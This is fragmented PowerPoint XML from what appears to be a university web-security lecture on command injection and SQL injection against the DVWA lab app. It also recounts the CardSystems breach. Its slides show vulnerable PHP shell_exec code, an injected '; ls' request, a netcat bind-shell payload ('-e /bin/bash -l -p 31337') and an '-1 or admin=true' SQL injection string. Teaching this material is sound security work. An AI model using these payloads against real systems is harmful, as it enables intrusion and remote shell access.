            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="4487779" y="601579"/>
              <a:ext cx="12700" cy="4740442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123908" y="3202632"/>
              <a:ext cx="1822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  <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
                <a:t>. Send page</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="24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10095" y="0"/>
            <a:ext cx="4653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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dvwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/vulnerabilities/exec/ HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: 172.16.59.128</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=127.0.0.1&amp;submit=submit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6380020" y="533400"/>
            <a:ext cx="1676400" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -184366"/>
              <a:gd name="adj2" fmla="val 45076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ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Screen Shot 2012-07-02 at 11.54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4600"/>
            <a:ext cx="6896100" cy="30734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343400" y="2743200"/>
            <a:ext cx="4267200" cy="1882525"/>
            <a:chOff x="4343400" y="2743200"/>
            <a:chExt cx="4267200" cy="1882525"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Snip Single Corner Rectangle 14"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4343400" y="2743200"/>
              <a:ext cx="4267200" cy="1476375"/>
            </a:xfrm>
            <a:prstGeom prst="snip1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dirty="0"/>
                <a:t>  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>…</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>  $</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>t</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t> = $_REQUEST[‘</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
                <a:t>ip</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>']; </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t> $o = </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
                <a:t>shell_exec</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>(‘ping –C 3’ . $t);</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>echo $o</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>  …</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr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05940" y="4256393"/>
              <a:ext cx="2142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PHP exec </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t>p</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
                <a:t>rogram</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rounded Rectangular Callout 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1355558" y="3124200"/>
            <a:ext cx="1981200" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 110217"/>
              <a:gd name="adj2" fmla="val -12460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spot the bug</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1374372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11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638800" y="1447800"/>
            <a:ext cx="2438400" cy="6096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98358" y="1447800"/>
            <a:ext cx="2438400" cy="6096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14" name="Elbow Connector 13"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="4487779" y="-992271"/>
            <a:ext cx="12700" cy="474044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123908" y="2133600"/>
            <a:ext cx="4740442" cy="698847"/>
            <a:chOff x="2123908" y="2965450"/>
            <a:chExt cx="4740442" cy="698847"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="17" name="Elbow Connector 16"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="4487779" y="601579"/>
              <a:ext cx="12700" cy="4740442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123908" y="3202632"/>
              <a:ext cx="1822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  <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
                <a:t>. Send page</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="24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10095" y="0"/>
            <a:ext cx="4653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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dvwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/vulnerabilities/exec/ HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: 172.16.59.128</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=127.0.0.1%3b+ls&amp;submit=submit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943600" y="381000"/>
            <a:ext cx="2438400" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -90686"/>
              <a:gd name="adj2" fmla="val 69036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“; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>” encoded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0" y="838200"/>
            <a:ext cx="762000" cy="362129"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/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2662518"/>
            <a:ext cx="6756400" cy="3966881"/>
            <a:chOff x="0" y="2662518"/>
            <a:chExt cx="6756400" cy="3966881"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="11" name="Picture 10" descr="Screen Shot 2012-07-02 at 11.58.34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62518"/>
              <a:ext cx="6756400" cy="3759200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Rounded Rectangular Callout 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2815140" y="5667464"/>
              <a:ext cx="2823660" cy="961935"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRoundRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -94651"/>
                <a:gd name="adj2" fmla="val -27136"/>
                <a:gd name="adj3" fmla="val 16667"/>
              </a:avLst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Information</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Disclosure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9882" y="5486400"/>
              <a:ext cx="1494118" cy="714465"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/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8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343400" y="2743200"/>
            <a:ext cx="4267200" cy="1882525"/>
            <a:chOff x="4343400" y="2743200"/>
            <a:chExt cx="4267200" cy="1882525"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="TextBox 21"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5405940" y="4256393"/>
              <a:ext cx="21421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PHP exec </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t>p</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
                <a:t>rogram</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Snip Single Corner Rectangle 14"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4343400" y="2743200"/>
              <a:ext cx="4267200" cy="1476375"/>
            </a:xfrm>
            <a:prstGeom prst="snip1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dirty="0"/>
                <a:t>  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>…</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>  $</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>t</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t> = $_REQUEST[‘</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
                <a:t>ip</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>']; </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t> $o = </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
                <a:t>shell_exec</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>(‘ping –C 3’ . $t);</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>echo $o</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>  …</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:defRPr/>
              </a:pPr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777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620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netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> –v –e ‘/bin/bash’ –l –p 31337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76300" y="1828800"/>
            <a:ext cx="7391400" cy="15240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fr-FR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=127.0.0.1+%26+netcat+-v+-e+'/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'+-l+-p+31337&amp;submit=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>submit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485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03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 Web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189" y="1418949"/>
            <a:ext cx="1600200" cy="2304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021" y="5029200"/>
            <a:ext cx="911250" cy="12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941128"/>
            <a:ext cx="2182611" cy="12704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162300" y="2209800"/>
            <a:ext cx="2819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86600" y="3810000"/>
            <a:ext cx="372595" cy="114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7715646" y="3429000"/>
            <a:ext cx="209154" cy="152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162300" y="2576365"/>
            <a:ext cx="2819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1400" y="1806309"/>
            <a:ext cx="16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user.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=5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65998" y="4234146"/>
            <a:ext cx="354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FROM users where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=5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33361" y="3774173"/>
            <a:ext cx="13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dbrumley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28009" y="2631180"/>
            <a:ext cx="13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dbrumley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3216275" y="1606667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3140075" y="4241947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8234557" y="3332455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3478013" y="2673565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24256" y="292693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46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Attack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189" y="1418949"/>
            <a:ext cx="1600200" cy="2304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021" y="5029200"/>
            <a:ext cx="911250" cy="12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941128"/>
            <a:ext cx="2182611" cy="12704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162300" y="2209800"/>
            <a:ext cx="2819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86600" y="3810000"/>
            <a:ext cx="372595" cy="114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7715646" y="3429000"/>
            <a:ext cx="209154" cy="152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162300" y="2576365"/>
            <a:ext cx="2819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68709" y="1806309"/>
            <a:ext cx="338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user.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>-1 or admin=true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42085" y="4427674"/>
            <a:ext cx="523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FROM users where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>-1 or admin=true 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751298" y="3774173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adminuser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28009" y="2631180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adminuser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2703584" y="1606667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1716162" y="4435475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8234557" y="3332455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3478013" y="2673565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24256" y="292693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61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293187"/>
            <a:ext cx="1676400" cy="1052407"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="mc_brand_113_gif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281" y="1180312"/>
            <a:ext cx="1640639" cy="1029957"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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B763EB4-AB53-445B-A24A-77B4A4F03C3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CardSystems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="153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CardSystems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credit card payment processing company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SQL injection attack in June 2005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put out of business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Attack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263,000 credit card #s stolen from database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credit card #s stored unencrypted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43 million credit card #s exposed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2400" y="6400800"/>
            <a:ext cx="5910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Image: http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>usa.visa.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>/merchants/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>marketing_center</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>logo_usage.html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              https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>www.mastercardbrandcenter.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>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2735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Primer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A05C-7D88-9E4B-B6AC-1CE35ACF5DD7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616538"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4099859" y="1380565"/>
          <a:ext cx="4236130" cy="1381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2880"/>
                <a:gridCol w="1391625"/>
                <a:gridCol w="13916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 1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of Type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2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of Type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3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of Type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98747"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="914400" y="4302760"/>
          <a:ext cx="7772402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72862"/>
                <a:gridCol w="1334655"/>
                <a:gridCol w="1334655"/>
                <a:gridCol w="1334655"/>
                <a:gridCol w="1334655"/>
                <a:gridCol w="1460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avatar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&lt;hash 1&gt;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admin.jpg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Gordon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gordonb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&lt;hash</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> 2&gt;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gordonb.jpg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&lt;hash 3&gt;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hacker.jpg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6172200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‘users’ table</a:t>
            </a:r>
            <a:endParaRPr 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228600" y="1143000"/>
            <a:ext cx="3733800" cy="2133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 table is defined by a tuple (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, ..., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" baseline="-25000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>of typed named values. Each row is a tuple of values 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(v</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, v</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, ... </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>v</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" baseline="-25000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" baseline="-25000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean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4300" y="3088957"/>
            <a:ext cx="8572500" cy="1189411"/>
            <a:chOff x="114300" y="3088957"/>
            <a:chExt cx="8572500" cy="1189411"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Rounded Rectangular Callout 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="114300" y="3612889"/>
              <a:ext cx="1181100" cy="398779"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRoundRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 43531"/>
                <a:gd name="adj2" fmla="val 100092"/>
                <a:gd name="adj3" fmla="val 1666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smallint</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Rounded Rectangular Callout 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4419600" y="3088957"/>
              <a:ext cx="1600200" cy="375285"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRoundRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 18705"/>
                <a:gd name="adj2" fmla="val 139199"/>
                <a:gd name="adj3" fmla="val 1666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varchar</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>(15)</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Right Brace 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="5257800" y="849368"/>
              <a:ext cx="533400" cy="6324600"/>
            </a:xfrm>
            <a:prstGeom prst="rightBrac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613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A05C-7D88-9E4B-B6AC-1CE35ACF5DD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630679" y="5791200"/>
            <a:ext cx="5943602" cy="9144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/>
              <a:t>A schema is a collection of tables</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>with their intended relations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254508"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="941294" y="914400"/>
          <a:ext cx="7772402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72862"/>
                <a:gridCol w="1334655"/>
                <a:gridCol w="1334655"/>
                <a:gridCol w="1334655"/>
                <a:gridCol w="1334655"/>
                <a:gridCol w="1460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avatar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&lt;hash 1&gt;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admin.jpg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Gordon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gordonb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&lt;hash</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> 2&gt;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gordonb.jpg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&lt;hash 3&gt;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hacker.jpg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059581" y="2743200"/>
            <a:ext cx="956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users</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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63369"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2551398" y="3420035"/>
          <a:ext cx="4041204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72862"/>
                <a:gridCol w="1463062"/>
                <a:gridCol w="1605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like sugar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But not milk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Gordon</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> is silly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744565" y="5274235"/>
            <a:ext cx="1654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comments</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400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19200" y="2743200"/>
            <a:ext cx="1332198" cy="67683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135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895600"/>
            <a:ext cx="6858000" cy="3810000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 smtClean="0">
                <a:latin typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
